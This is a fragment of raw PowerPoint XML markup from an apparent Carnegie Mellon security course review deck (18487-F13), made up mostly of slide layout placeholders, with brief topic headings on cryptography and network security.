                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>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b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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fld id="{4AE2781C-3131-644C-A39B-D48D3831D8A0}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013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57464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1F6D2F80-B2E2-DA48-A73C-8D27FCE09A18}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013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12862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0"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9272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31D4F3BA-FDB9-9844-AF5C-ADFACC0D4005}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013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10020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E0E002D3-7C23-4642-A76C-F8FD5DFDDF35}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013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26994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ctr" anchorCtr="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8FBB8268-9344-2349-A92C-564C30E780EB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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795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07C43026-A2E2-CB41-9B00-FB650AB62B47}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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9902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fld id="{5DD7A3CB-B31F-F44D-BE5E-9BB9DAE334F7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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894157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6A51808E-B86A-3049-9E73-66230804105F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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1164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FC2AE5A6-8A00-9D4F-8BFC-81445E065A10}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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8425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90BF4048-B1EC-004A-A42E-7CFEC5F95F2B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013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8705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6B3EA1C3-66FE-B146-B8CD-D12359AFFB12}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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711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6E4F9789-9E7B-9445-BA18-928DDAC33B10}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013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4177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fld id="{04ABFA97-EBAF-9D4A-9845-F2CD0727B02A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>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109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457200" y="3034508"/>
            <a:ext cx="6951274" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="1" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Section Header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474134" y="1524000"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"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58842061-E09A-C64F-AC91-6B22DD773FB7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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045139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264380" y="2013343"/>
            <a:ext cx="6951274" cy="753670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Section Header 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1264380" y="2919413"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C88B15C4-75F8-8145-B332-9C9E6CC1694D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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626498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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">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100DE902-58D7-5940-B7B2-BB1B96F0CB4F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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28313200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535113"/>
            <a:ext cx="4040188"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981200"/>
            <a:ext cx="4040188"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535113"/>
            <a:ext cx="4041775" cy="446087"/>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981200"/>
            <a:ext cx="4041775" cy="414496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fld id="{97BE05AF-3078-DE4E-8E55-E5E804412B8D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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4196852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F38595AD-FC1D-6647-9C7B-6A6A09EB9496}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013</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302077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78FB06B4-F6A6-3F44-9030-7566931308D3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013</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394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noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800" b="1"/>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8BF8F280-9551-E344-89F9-EAAD5E158938}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/2/2013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B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105480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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag70.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69.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag68.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67.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6"/>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7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A990C2A9-FE53-4849-A08D-11DD13CE8E41}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
            <p:custDataLst>
              <p:tags r:id="rId19"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3229604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Clr>
          <a:schemeClr val="tx1"/>
        </a:buClr>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Clr>
          <a:schemeClr val="tx1"/>
        </a:buClr>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Clr>
          <a:schemeClr val="tx1"/>
        </a:buClr>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Clr>
          <a:schemeClr val="tx1"/>
        </a:buClr>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Clr>
          <a:schemeClr val="tx1"/>
        </a:buClr>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152400"/>
            <a:ext cx="8229600" cy="114300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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="4754563"/>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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{CB4C7E2E-E20D-8F45-BC54-3028A7161583}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>12/2/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009446"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-54849939962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81953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b="0" i="0" kern="1200" spc="-50" normalizeH="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Cambria"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:body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6.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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6.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.emf"/></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7.emf"/></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0.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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1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8.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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5.emf"/><Relationship Id="rId7"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6.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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1.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.emf"/></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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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32.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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802348"/>
            <a:ext cx="7772400" cy="1702852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>Course Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5595617" y="4572000"/>
            <a:ext cx="2862583" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>18487-F13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Carnegie Mellon University</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294340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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="18487-crypto.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1922319" y="0"/>
            <a:ext cx="5299364" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65148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9600" y="152400"/>
            <a:ext cx="4267200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Theory Breakdown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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Crypto Outlin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6200"/>
            <a:ext cx="8458200" cy="6535882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157673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Understand and believe you should never, ever invent your own algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic construction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic pitfalls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3206562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Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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3192207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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="18487-netsec.pdf"/>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200000">
            <a:off x="850043" y="-1435958"/>
            <a:ext cx="7230629" cy="9357285"/>
          </a:xfrm>
